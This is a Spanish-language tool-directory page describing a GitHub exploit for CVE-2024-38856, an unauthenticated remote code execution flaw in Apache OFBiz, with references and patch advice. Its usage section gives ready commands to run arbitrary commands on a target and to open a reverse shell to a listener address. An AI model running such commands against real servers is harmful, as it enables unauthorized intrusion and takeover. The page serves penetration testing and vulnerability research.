Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Apache-OFBiz-Exploit — Exploit para Apache OFBiz - CVE-2024-38856 | Kitploit
Herramientas/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

Exploit para Apache OFBiz - CVE-2024-38856

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Apache-OFBiz-Exploit

Exploit para Apache OFBiz (CVE-2024-38856) Por: Alisson Faoli

Descripción

Este repositorio contiene un exploit para la vulnerabilidad CVE-2024-38856 encontrada en Apache OFBiz. El fallo permite una RCE (Ejecución Remota de Código) sin autenticación.

Nota: Este exploit se proporciona únicamente con fines educativos y de investigación. El uso indebido puede ser ilegal y es responsabilidad exclusiva del usuario.

Detalles de la Vulnerabilidad

CVE: CVE-2024-38856

Software afectado: Apache OFBiz hasta la versión 18.12.14

Tipo de vulnerabilidad: RCE

Explotación: No se requiere autenticación

Referencias:

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

Uso

Clona el repositorio:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

Instala las dependencias:

root@kitploit:~
pip install -r requirements.txt

Ejecuta el exploit:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

Mitigación

Para remediar esta vulnerabilidad, se recomienda que los administradores de Apache OFBiz: Actualicen a la versión corregida disponible en https://ofbiz.apache.org/download.html. Apliquen reglas de firewall o WAF para bloquear intentos de explotación conocidos.

Contacto

Si tienes alguna pregunta o quieres reportar una mejora al exploit, contáctame: LinkedIn: https://linkedin.com/in/alisson-faoli/

Aviso legal:

Este código se proporciona únicamente con fines educativos y para pruebas de seguridad en entornos autorizados. El autor no es responsable de ningún uso indebido.

Descargar herramienta